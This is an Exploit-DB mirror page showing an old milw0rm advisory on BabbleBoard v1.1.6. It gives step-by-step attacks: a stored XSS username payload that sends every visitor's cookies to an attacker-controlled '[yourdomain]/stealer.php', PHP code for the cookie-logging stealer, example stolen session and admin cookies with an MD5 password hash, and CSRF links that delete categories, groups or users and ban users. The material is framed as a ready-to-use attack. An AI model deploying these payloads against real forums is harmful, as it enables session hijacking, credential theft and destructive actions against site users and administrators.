bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7475.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

79 lines
No EOL
2.2 KiB
Text
Raw Blame History

############################################################################################
[+] BabbleBoard v1.1.6 Cookie Grabber Exploit/CSRF
[+] Discovered By SirGod
[+] Greetz : All my friends
############################################################################################
[+] Cookie Grabber Exploit
- Steal the cookie of any visitor.
1.Register as :
<script>document.location
="http://[yourdomain]/[path]/stealer.php?cookie=" +
document.cookie;</script>
Everyone who visit the index page will be redirected on your cookie
grabber. (because you will be the Latest Member)
Be sure that you use " and not ' because is forbbiden to use that char
is your username.
2 . In stealer.php use the following code (simple cookie grabber)
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
Make sure that you have in the stealer.php directory a file log.txt .
For stealed cookies check log.txt .
3 . You will grab every visitor cookie .
Example (cookie) of a not logged in user :
PHPSESSID=gtolfce6jppb4oasfm81efrqf6
Example (cookie) of a logged in user (admin) :
bb_name=admin; bb_password=d73ed8a01f624fcb878296bc7ff302bc;
PHPSESSID=gtolfce6jppb4oasfm81efrqf6
Username is bb_name.Password is bb_password and is hashed as md5.
[+] Cross Site Request Forgery
If a logged in user with administrative permissions click one of the
following links the specified action will be executed.
- Delete category
http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=[CatID]
http://127.0.0.1/[path]index.php?page=admin&act=categories&func=delete&id=5
- Delete group
http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=[GroupID]
http://127.0.0.1/[path]index.php?page=admin&act=groups&func=delete&id=2
- Ban User
http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=[UserID]
http://127.0.0.1/[path]index.php?page=admin&act=members&func=ban&id=4
- Delete User
http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=[UserID]
http://127.0.0.1/[path]index.php?page=admin&act=members&func=delete&id=4
############################################################################################
# milw0rm.com [2008-12-15]
Reference in a new issue View git blame Copy permalink